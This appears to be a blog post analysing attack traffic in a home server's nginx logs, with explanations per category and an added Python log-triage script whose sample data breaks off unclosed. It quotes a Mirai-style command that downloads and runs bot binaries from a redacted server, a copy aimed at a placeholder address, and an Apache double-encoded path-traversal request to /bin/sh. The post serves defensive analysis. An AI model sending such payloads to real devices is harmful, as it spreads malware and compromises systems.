Alarming traffic seen in a home server's access logs
Introduction
When you run a home server, a stream of access log entries accumulates every day, and a good share of them show suspicious behaviour. This article shares a selection of the entries recorded by my home server's web server that look like attack traffic.
Access log entries that may be attacks
Grouped by category. Client addresses are masked as `ip`. The lines appear to be in nginx's combined log format with the X-Forwarded-For value as the last quoted field, and non-printable bytes in the request are written as `\xHH`, which is why some entries below start with hex escapes instead of an HTTP method.
Reconnaissance and secret theft
Requests for /.env and /.git/config look for an environment file or repository metadata that was deployed under the web root; a hit hands over database credentials, API keys or the full source history. The burst at 12:24 tries the same file under dozens of guessed directories with a different User-Agent on every request, the signature of a single scanner rotating its UA string. Two entries are of a different kind: POST /dns-query probes for a DNS-over-HTTPS resolver, and the line beginning \x03\x00 with "Cookie: mstshash=" is not HTTP at all but the opening of an RDP connection request (a TPKT header followed by the RDP cookie) sent to the web port.
ip - - [09/Jan/2025:08:48:53 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.94 Safari/537.36" "-"
ip - - [09/Jan/2025:10:28:23 +0000] "GET /.env HTTP/1.1" 404 134 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8" "-"
ip - - [09/Jan/2025:09:39:50 +0000] "GET /.env HTTP/1.1" 404 134 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15" "-"
ip - - [09/Jan/2025:06:57:08 +0000] "GET /.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:10:45:38 +0000] "GET /.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 Keydrop" "-"
ip - - [09/Jan/2025:06:57:15 +0000] "GET /portal/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:17 +0000] "GET /env/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:20 +0000] "GET /api/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:23 +0000] "GET /app/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:25 +0000] "GET /dev/.env HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:08:06:23 +0000] "POST /dns-query HTTP/1.1" 404 162 "-" "-" "-"
ip - - [09/Jan/2025:05:36:05 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:12:24:00 +0000] "GET /.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; N850L Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:01 +0000] "GET /Demo/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)" "-"
ip - - [09/Jan/2025:12:24:01 +0000] "GET /DEMO/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618)" "-"
ip - - [09/Jan/2025:12:24:01 +0000] "GET /.env HTTP/1.1" 404 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
ip - - [09/Jan/2025:12:24:04 +0000] "GET /Dev/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36" "-"
ip - - [09/Jan/2025:12:24:04 +0000] "GET /DEV/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows NT 6.3; rv:52.0.1) Gecko/20100101 Firefox/52.0.1" "-"
ip - - [09/Jan/2025:12:24:05 +0000] "GET /Doc/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; Touch; ASU2JS)" "-"
ip - - [09/Jan/2025:12:24:05 +0000] "GET /DOC/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4" "-"
ip - - [09/Jan/2025:12:24:06 +0000] "GET /Docs/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "-"
ip - - [09/Jan/2025:12:24:07 +0000] "GET /DOCS/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)" "-"
ip - - [09/Jan/2025:12:24:07 +0000] "GET /Download/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20100101 Firefox/30.0 ZemanaAID/FFFF009F" "-"
ip - - [09/Jan/2025:12:24:08 +0000] "GET /Env/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Linux; Android 4.4.4; Nexus 5 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.114 Mobile Safari/537.36" "-"
ip - - [09/Jan/2025:12:24:09 +0000] "GET /Html/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.1.2 Safari/525.21" "-"
ip - - [09/Jan/2025:12:24:09 +0000] "GET /Inc/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24" "-"
ip - - [09/Jan/2025:12:24:10 +0000] "GET /Infos/ HTTP/1.1" 400 264 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061213 Firefox/1.5.0.8" "-"
ip - - [09/Jan/2025:12:24:11 +0000] "GET /Lib/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9.2.1 like Mac OS X; en_US) AppleWebKit/1 (KHTML, like Gecko) Mobile/1 Safari/1 iPhone/1 EtsyInc/4.31 rv:43100.64.0" "-"
ip - - [09/Jan/2025:12:24:11 +0000] "GET /Library/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; C5170 Build/IML77) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:12 +0000] "GET /Logging/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" "-"
ip - - [09/Jan/2025:12:24:13 +0000] "GET /Media/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (X11; FreeBSD amd64; rv:43.0) Gecko/20100101 Firefox/43.0" "-"
ip - - [09/Jan/2025:12:24:13 +0000] "GET /Misc/.env HTTP/1.1" 400 264 "-" "Opera/5.12 (Windows NT 5.1; U) [de]" "-"
ip - - [09/Jan/2025:12:24:14 +0000] "GET /New/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; Alexa Toolbar)" "-"
ip - - [09/Jan/2025:12:24:16 +0000] "GET /Production/.env HTTP/1.1" 400 264 "-" "Opera/9.01 (X11; OpenBSD i386; U; en)" "-"
ip - - [09/Jan/2025:12:24:17 +0000] "GET /Public/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" "-"
ip - - [09/Jan/2025:12:24:18 +0000] "GET /Server/.env HTTP/1.1" 400 666 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUSMSNIP)" "-"
ip - - [09/Jan/2025:12:24:18 +0000] "GET /Shared/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; playbrytetoolbar_Playbryte)" "-"
ip - - [09/Jan/2025:12:24:19 +0000] "GET /Site/.env HTTP/1.1" 400 264 "-" "Opera/9.63 (Windows NT 6.0; U; cs) Presto/2.1.1" "-"
ip - - [09/Jan/2025:12:24:20 +0000] "GET /Stage/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16" "-"
ip - - [09/Jan/2025:12:24:20 +0000] "GET /Staging/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16" "-"
ip - - [09/Jan/2025:12:24:21 +0000] "GET /Upload/.env HTTP/1.1" 400 666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; McAfee)" "-"
ip - - [09/Jan/2025:12:24:22 +0000] "GET /Vendor/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; LG-LS995 Build/JDQ39B) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:22 +0000] "GET /Web/.env HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko" "-"
Login probes
These paths are the login pages of specific products: /remote/login is the FortiOS SSL-VPN portal, /vpn/index.html the Citrix Gateway portal, and /carbon/admin/login.jsp the WSO2 Carbon management console. The scanner is checking whether one of those appliances is present before trying credentials; the 404s show it is not.
ip - - [09/Jan/2025:03:15:31 +0000] "GET /remote/login HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:03:15:31 +0000] "GET /vpn/index.html HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:03:15:31 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:03:15:32 +0000] "GET /vpn/index.html HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203" "-"
ip - - [09/Jan/2025:08:07:20 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "-"
ip - - [09/Jan/2025:08:07:20 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "-"
Open-proxy probe
A CONNECT host:443 request tests whether the server is an open forward proxy that will tunnel arbitrary TCP connections for the client; the 400 is the right answer from a server that does not proxy.
ip - - [09/Jan/2025:06:09:24 +0000] "CONNECT web.realsysadm.in:443 HTTP/1.1" 400 166 "-" "-" "-"
PHP
phpinfo.php is requested in several capitalisations to catch case-insensitive file systems, and the XDEBUG_SESSION_START=phpstorm query string asks an Xdebug-enabled PHP to open a debugger connection back to the requesting client. The 200 on that line is only the normal front page being served with an unused query string; it is not evidence that Xdebug answered.
ip - - [09/Jan/2025:05:13:16 +0000] "GET /phpinfo HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:05:13:17 +0000] "GET /phpinfo.php HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:07:57:49 +0000] "GET /cgi-bin/php/login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36" "-"
ip - - [09/Jan/2025:07:56:34 +0000] "POST /cgi-bin/php/login_check.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-"
ip - - [09/Jan/2025:06:57:11 +0000] "GET /phpinfo HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:06:57:13 +0000] "GET /phpinfo.php HTTP/1.1" 404 134 "-" "-" "-"
ip - - [09/Jan/2025:04:39:35 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 3107 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
ip - - [09/Jan/2025:12:24:15 +0000] "GET /Phpinfo.php HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Linux; U; Android 4.3; en-au; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-"
ip - - [09/Jan/2025:12:24:15 +0000] "GET /PHPinfo.php HTTP/1.1" 400 264 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "-"
ip - - [09/Jan/2025:12:24:16 +0000] "GET /PHPINFO.php HTTP/1.1" 400 666 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SM-S327VL Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36" "-"
Information tampering
A binary, non-HTTP message carrying a small JSON object (fields i, v, p, u and c, with a version string and an Android ABI and device-model string) delivered to the web port. Which protocol it belongs to cannot be determined from this line alone.
ip - - [09/Jan/2025:04:27:28 +0000] "\x00\x00\xFF\x01\x00P\x00\x00\x00\x00\x80\x00\x00{\x22i\x22:10,\x22v\x22:\x2212.28.204\x22,\x22p\x22:1,\x22u\x22:\x220000000000000BEE2504C95B94662B261D37092152B09A169178480240002663\x22,\x22c\x22:\x22arm64-v8a ELE-AL00\x22}" 400 166 "-" "-" "-"
WordPress
Requesting wp-includes/wlwmanifest.xml under a list of guessed sub-directories is the standard way scanners locate a WordPress install wherever it is mounted; /wp-json confirms the REST API, and the wp-time-capsule plugin path and the sodium_compat core file check for a specific plugin and a specific core version.
ip - - [09/Jan/2025:11:45:28 +0000] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //2020/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:28 +0000] "GET //2021/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:29 +0000] "GET //site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:11:45:30 +0000] "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "x.x.x.x"
ip - - [09/Jan/2025:07:36:07 +0000] "GET /wp-json HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "ip (ipv6)"
ip - - [09/Jan/2025:07:36:08 +0000] "GET /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" "ip (ipv6)"
ip - - [09/Jan/2025:07:36:06 +0000] "GET /wp-json HTTP/1.1" 404 134 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" "ip (ipv6)"
ip - - [09/Jan/2025:04:14:04 +0000] "GET /wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Core32.php HTTP/1.1" 404 196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "ip"
Vulnerability exploitation
/actuator/gateway/routes is the Spring Boot Actuator endpoint exposed by Spring Cloud Gateway. Listing the routes is the reconnaissance step before the route-definition code-injection flaw in that endpoint (CVE-2022-22947) is attempted.
ip - - [09/Jan/2025:06:20:25 +0000] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
Malware download
A Mirai-style bot payload aimed at the /shell? command endpoint of JAWS-based DVR web servers (the trailing "jaws" argument names the target): kill competing bots, fetch binaries into /tmp with wget, chmod 777 them and run them. The "KrebsOnSecurity" User-Agent is characteristic of these variants. The bracketed values and the file names are the author's redactions.
[ip] - - [10/Jan/2025:09:53:58 +0000] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/z/bin;cd+/tmp;rm+malware1+malware2;wget+http:/\x5C/[malware-server-ip]/malware1;chmod+777+malware1;./malware1+jaws;wget+http:/\x5C/[malware-server-ip]/malware2;chmod+777+malware2;./malware2+jaws HTTP/1.1" 404 134 "-" "KrebsOnSecurity" "-"
SOCKS5 and other raw handshakes
The lines beginning \x16\x03\x01 are TLS ClientHello records (handshake record type 0x16, record version 3.1) sent to the plaintext HTTP port; the cipher-suite lists in the last two even include the TLS 1.3 suites \x13\x01 to \x13\x03. They may be scanners or simply clients speaking HTTPS to port 80. Only the final \x05\x01\x00 line is a SOCKS5 greeting (version 5, one offered method, 0x00 = no authentication), i.e. a probe for an open SOCKS proxy.
ip - - [09/Jan/2025:03:14:07 +0000] "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x1C\x80\x94\x09Ja\xB2m\xF0\xAD\x87@\xE4\xEC\xBB\xF1\xAA@\xA56\xB6\xA1\x8D\xB1\xF3\xCCtUO\xFF\xE1$\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0'\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:03:14:07 +0000] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xAD\xCD\xD0Z\x0C\xC0\xEC\xC1\x11\xE0\xFD\xBD\xC9\x01\x91\x01\x02\x97\xEE\xD9\x80\x90\xFB\xCD\xE6\xB8Kz\x7F\xE86\x16 YT\x22\xDCa\x9Cs'\x0F\xD1\xE8od\x0F\x8C\x96p\xE1c\x05\xCC\xAD\x15V\xF8eX\xD8l[aq\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:08:07:56 +0000] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xD2R\xC7d\x83\xBB\xC6\xEB9{\x88$\xCD\x198\xAAK\x80dK\x0E\xC7?m~(\x85\x10\xF4\xE4G\xF3 \x05\xB82\xDD\xD6q\xC8^\xF3\x9E9\x1D\x9C\x9B?Oq\xA5p\x15T\xA8\xD74\x88t:\x80\x96nk\xF6\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0'\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:08:07:45 +0000] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xDE6,c\x93`\x82\xEE\x1D\xB0\xEFr\xEF\x13\xC9\xDA\xF1]x\xD7\xB1k\xEBcP\xA4\xE9\x85\xB6\xC1n\xBE &\x0B\xC8!\xFD\xF3\xD7\xE8\xC7@\x16\xE8\xCAO>\xE0\xD0\xDE\xEE$\x99\xB7\xE5\xCC\xD8!T\x0E\x14\x0B\x89\x1B\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0'\xC0" 400 166 "-" "-" "-"
ip - - [09/Jan/2025:07:10:45 +0000] "\x05\x01\x00" 400 166 "-" "-" "-"
RCE (remote command execution)
%%32%65 is a double-encoded dot: a first decode turns %32%65 into %2e, and a second decode turns that into ".". The target therefore resolves to /cgi-bin/ followed by a run of ../ segments ending in /bin/sh, which is the Apache HTTP Server 2.4.49/2.4.50 path-traversal bug (CVE-2021-41773 and its double-encoding bypass CVE-2021-42013) turned into command execution through mod_cgi, with the command carried in the POST body. The 400 shows this server rejected the request.
ip - - [11/Jan/2025:03:10:26 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 166 "-" "-" "-"
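To triage a log like the one above automatically, the entries have to be parsed, the nginx \xHH escapes turned back into bytes, the request target percent-decoded until it stops changing (so the %%32%65 trick cannot hide a traversal), and only then matched against category rules. The script below does that for the categories used in this post. It is an added example, not code from the original post; it assumes the nginx combined-plus-X-Forwarded-For format inferred above, the category names and rules are this example's own, and the sample lines are constructed copies of the post's entries with documentation-range addresses.

```python
"""Triage of access-log lines into the categories used in this post.
Added example, not code from the original post. Assumed log format: nginx
"combined" with "$http_x_forwarded_for" appended. Category rules are the
example's own, not a standard taxonomy."""
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote

# One nginx-style line: ip - user [time] "request" status bytes "referer" "ua" "xff"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>.*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)
HTTP_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$')


def unescape_nginx(s: str) -> str:
    """nginx logs non-printable request bytes as \\xHH; turn them back into characters."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), s)


def normalize_path(path: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double encodings collapse (%%32%65 -> %2e -> '.')."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_raw(raw: str) -> str:
    """Requests that are not HTTP: name the protocol from the leading bytes."""
    if raw.startswith('\x16\x03'):                        # TLS handshake record, version 3.x
        return 'tls-clienthello-on-plaintext-port'
    if raw.startswith('\x05\x01'):                        # SOCKS5 greeting: ver 5, one auth method
        return 'socks5-probe'
    if raw.startswith('\x03\x00') and 'mstshash' in raw:  # TPKT header + RDP connection cookie
        return 'rdp-probe'
    return 'non-http-binary'


def classify_http(method: str, target: str) -> str:
    """Map a decoded request target onto the post's categories (rules are this example's)."""
    low = normalize_path(target).lower()
    if method == 'CONNECT':
        return 'open-proxy-probe'
    if low.startswith('/shell?') or re.search(r'\b(wget|curl|chmod|killall)\b', low):
        return 'malware-download'
    if '/../' in low or low.endswith('/..'):   # only visible after full decoding
        return 'path-traversal-rce'
    if low.startswith('/actuator/'):
        return 'actuator-exposure'
    if 'phpinfo' in low or 'xdebug_session_start' in low or '/cgi-bin/php' in low:
        return 'php-probe'
    if any(k in low for k in ('/wp-includes/', '/wp-content/', '/wp-json', 'wlwmanifest')):
        return 'wordpress-probe'
    if re.search(r'/\.(env|git)(/|$)', low):
        return 'secrets-exposure'
    if 'login' in low or '/vpn/' in low:
        return 'login-probe'
    return 'other'


def classify(line: str) -> Optional[dict]:
    """Parse one log line and return its category, or None if the line is not parseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = unescape_nginx(m['req'])
    h = HTTP_RE.match(raw)
    if h:
        category, target = classify_http(h['method'], h['target']), normalize_path(h['target'])
    else:
        category, target = classify_raw(raw), repr(raw[:12])
    return {'ip': m['ip'], 'status': int(m['status']), 'category': category, 'target': target}


def triage(lines):
    """Classify every line; return the hits and a count per category."""
    hits = [h for h in map(classify, lines) if h]
    return hits, Counter(h['category'] for h in hits)


# Constructed sample lines modelled on the post's entries (RFC 5737 documentation
# addresses, not real clients). Raw string so the \xHH escapes stay as nginx wrote them.
SAMPLE_LOG = r'''
203.0.113.10 - - [09/Jan/2025:08:48:53 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.0" "-"
203.0.113.11 - - [09/Jan/2025:06:57:20 +0000] "GET /api/.env HTTP/1.1" 404 134 "-" "-" "-"
203.0.113.12 - - [09/Jan/2025:05:36:05 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-" "-"
203.0.113.13 - - [09/Jan/2025:06:09:24 +0000] "CONNECT web.example.net:443 HTTP/1.1" 400 166 "-" "-" "-"
203.0.113.14 - - [09/Jan/2025:04:39:35 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 3107 "-" "Mozilla/5.0" "-"
203.0.113.15 - - [09/Jan/2025:11:45:28 +0000] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0" "198.51.100.7"
203.0.113.16 - - [09/Jan/2025:06:20:25 +0000] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "Mozilla/5.0" "-"
203.0.113.17 - - [10/Jan/2025:09:53:58 +0000] "GET /shell?cd+/tmp;wget+http:/\x5C/198.51.100.9/bot;chmod+777+bot;./bot+jaws HTTP/1.1" 404 134 "-" "KrebsOnSecurity" "-"
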